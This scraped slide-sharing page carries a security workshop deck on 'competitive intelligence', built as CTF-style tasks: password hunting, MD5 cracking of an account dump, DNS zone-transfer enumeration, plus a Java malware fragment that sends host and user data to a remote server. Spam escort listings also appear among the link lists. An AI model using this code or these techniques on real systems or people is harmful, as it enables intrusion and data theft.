SlideShare ist ein Scribd-Unternehmen logo

Security Hole #11 - Competitive intelligence - Beliaiev

Als PPTX, PDF herunterladen
Nazar Tymoshyk, CEH, Ph.D.
Nazar Tymoshyk, CEH, Ph.D.
Technologie
1 von 29
Competitive Intelligence – Competitor's Fatality Igor Beliaiev
What is Competitive Intelligence(CI)?
Basic methods
Start is here: goo.gl/ygm51k Інфо ебаут хак The Workshop
Task #1. Intro We know that Mikko Kuttonen is using github. His github for working staff is mikkoKut1 You have to find his password for the home media server(107.170.*.*).
Task #2. Pakistani There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution. We have some information about his last attacks, so we have to find out what he has done with his victims.
We have some dump with journalist's accounts on times.com. (times.zip) Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password. Task #2. Pakistani Hint! Journalist’s passwords are encrypted with MD5 algorithm Hint! You can use MD5 online decoders
Task #3. Archive As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted. We need to read the data from zikua.doc Hint! Look carefully for the files in archives. Are there any common things? Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
Task #4. Zik.ua From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua We need to find the subdomain and torrent server. Hint! DNS-requests might help you Hint! You can try to use AXFR-requests
$1mln/month ValveSoftware.com
Task #5. Find the hacker Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password. We started to download his private files, but suddenly connection was lost...forever. We managed to download only one file. Using this file, find the name of the hacker!
Task #5. Find the hacker
• Nickname: johnsmith@athc.biz • Find his place and date of birth Tasks from PHDays
Tasks from PHDays
Tasks from PHDays
Tasks from PHDays
Tasks from PHDays String str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
Tasks from PHDays + WebRTC (net.ipcalf.com)
Tasks from PHDays
? ?

Empfohlen

4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadhShailendra Sadh - CISSP
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksBaronZor
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsTazdrumm3r
 
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012DefCamp
 
osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb Jose Manuel Ortega Candel
 
อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)thummapron
 
Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsTazdrumm3r
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis ENGangSeok Lee
 

Empfohlen

4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadhShailendra Sadh - CISSP
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksBaronZor
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsTazdrumm3r
 
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012DefCamp
 
osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb Jose Manuel Ortega Candel
 
อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)thummapron
 
Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsTazdrumm3r
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis ENGangSeok Lee
 
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Nazar Tymoshyk, CEH, Ph.D.
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through InjectionsNazar Tymoshyk, CEH, Ph.D.
 
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykSecurity Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykNazar Tymoshyk, CEH, Ph.D.
 
Agile and Secure SDLC
Agile and Secure SDLCAgile and Secure SDLC
Agile and Secure SDLCNazar Tymoshyk, CEH, Ph.D.
 
El inventario
El inventarioEl inventario
El inventariogkltravieso
 
Makalah agama islam
Makalah agama islamMakalah agama islam
Makalah agama islamSMAN 54 Jakarta
 
Team 4
Team 4Team 4
Team 4YGHCC14
 
See andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowSee andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowandyfullsail
 
Superbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FranceSuperbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FrancePlanningLeoBurnettFrance
 
Manegerial communication
Manegerial communicationManegerial communication
Manegerial communicationValarmathi Chinnaswamy
 
Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.Petra Trimmel - Product Management Hub | Art-Y-Sana
 
Andrés alfaro salas
Andrés alfaro salasAndrés alfaro salas
Andrés alfaro salasAndrés Alfaro
 
JAVA Business Application
JAVA Business ApplicationJAVA Business Application
JAVA Business ApplicationJackie Wolf
 
Music videos
Music videosMusic videos
Music videosCharLilyMay
 
Prijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziPrijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziKostic Valentina
 
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptxanlio
 
Rpp bi new
Rpp bi newRpp bi new
Rpp bi newAkio Hiba
 
Whey gold standard da optimum nutrition
Whey gold standard da optimum nutritionWhey gold standard da optimum nutrition
Whey gold standard da optimum nutritionPaul Davidson
 
Music through the ages
Music through the ages Music through the ages
Music through the ages CharLilyMay
 
Team 5
Team 5Team 5
Team 5YGHCC14
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 

Weitere ähnliche Inhalte

Andere mochten auch

Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Nazar Tymoshyk, CEH, Ph.D.
 
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykSecurity Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykNazar Tymoshyk, CEH, Ph.D.
 
See andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowSee andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowandyfullsail
 
Superbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FranceSuperbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FrancePlanningLeoBurnettFrance
 
JAVA Business Application
JAVA Business ApplicationJAVA Business Application
JAVA Business ApplicationJackie Wolf
 
Prijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziPrijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziKostic Valentina
 
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptxanlio
 
Whey gold standard da optimum nutrition
Whey gold standard da optimum nutritionWhey gold standard da optimum nutrition
Whey gold standard da optimum nutritionPaul Davidson
 
Music through the ages
Music through the ages Music through the ages
Music through the ages CharLilyMay
 

Andere mochten auch (20)

Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
 
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykSecurity Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
 
Agile and Secure SDLC
Agile and Secure SDLCAgile and Secure SDLC
Agile and Secure SDLC
 
El inventario
El inventarioEl inventario
El inventario
 
Makalah agama islam
Makalah agama islamMakalah agama islam
Makalah agama islam
 
Team 4
Team 4Team 4
Team 4
 
See andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowSee andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesow
 
Superbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FranceSuperbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett France
 
Manegerial communication
Manegerial communicationManegerial communication
Manegerial communication
 
Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.
 
Andrés alfaro salas
Andrés alfaro salasAndrés alfaro salas
Andrés alfaro salas
 
JAVA Business Application
JAVA Business ApplicationJAVA Business Application
JAVA Business Application
 
Music videos
Music videosMusic videos
Music videos
 
Prijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziPrijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izrazi
 
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
 
Rpp bi new
Rpp bi newRpp bi new
Rpp bi new
 
Whey gold standard da optimum nutrition
Whey gold standard da optimum nutritionWhey gold standard da optimum nutrition
Whey gold standard da optimum nutrition
 
Music through the ages
Music through the ages Music through the ages
Music through the ages
 
Team 5
Team 5Team 5
Team 5
 

Ähnlich wie Security Hole #11 - Competitive intelligence - Beliaiev

Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 
Corporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadCorporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadAzad Mzuri
 
Exploiting null byte vm
Exploiting null byte vmExploiting null byte vm
Exploiting null byte vmdevanshdubey7
 
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016Tim Butler
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONLyon Yang
 
Footprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingFootprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingSathishkumar A
 
Fighting Malware Without Antivirus
Fighting Malware Without AntivirusFighting Malware Without Antivirus
Fighting Malware Without AntivirusEnergySec
 
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdfCase Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdff3apparelsonline
 
Ulfah
UlfahUlfah
Ulfahulfah
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesÖmer Coşkun
 
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...PROIDEA
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...CODE BLUE
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Hackers are innocent
Hackers are innocentHackers are innocent
Hackers are innocentdanish3
 
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...Cyphort
 

Ähnlich wie Security Hole #11 - Competitive intelligence - Beliaiev (20)

Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
Phd final
Phd finalPhd final
Phd final
 
Corporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadCorporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by Azad
 
Exploiting null byte vm
Exploiting null byte vmExploiting null byte vm
Exploiting null byte vm
 
Hacking
HackingHacking
Hacking
 
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
 
Footprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingFootprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hacking
 
Fighting Malware Without Antivirus
Fighting Malware Without AntivirusFighting Malware Without Antivirus
Fighting Malware Without Antivirus
 
Cryptography Attacks and Applications
Cryptography Attacks and ApplicationsCryptography Attacks and Applications
Cryptography Attacks and Applications
 
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdfCase Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdf
 
Ulfah
UlfahUlfah
Ulfah
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic Techniques
 
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.
 
Hackers are innocent
Hackers are innocentHackers are innocent
Hackers are innocent
 
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
 

Mehr von Nazar Tymoshyk, CEH, Ph.D.

Black magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionBlack magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionNazar Tymoshyk, CEH, Ph.D.
 
Security as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleSecurity as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleNazar Tymoshyk, CEH, Ph.D.
 
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рухNazar Tymoshyk, CEH, Ph.D.
 
OWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav BreslavskyiOWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav BreslavskyiNazar Tymoshyk, CEH, Ph.D.
 
Проект реабілітації військових в ІТ
Проект реабілітації військових в ІТПроект реабілітації військових в ІТ
Проект реабілітації військових в ІТNazar Tymoshyk, CEH, Ph.D.
 

Mehr von Nazar Tymoshyk, CEH, Ph.D. (8)

Black magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionBlack magic of web attacks Detection and Prevention
Black magic of web attacks Detection and Prevention
 
CIA Hacking Organization in the Nutshell
CIA Hacking Organization in the NutshellCIA Hacking Organization in the Nutshell
CIA Hacking Organization in the Nutshell
 
Security as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleSecurity as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development Lifecycle
 
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
 
OWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav BreslavskyiOWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav Breslavskyi
 
Automotive security testing
Automotive security testing Automotive security testing
Automotive security testing
 
Agile and Secure Development
Agile and Secure DevelopmentAgile and Secure Development
Agile and Secure Development
 
Проект реабілітації військових в ІТ
Проект реабілітації військових в ІТПроект реабілітації військових в ІТ
Проект реабілітації військових в ІТ
 

Kürzlich hochgeladen

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Hyundai Motor Group
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetEnjoy Anytime
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 

Kürzlich hochgeladen (20)

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
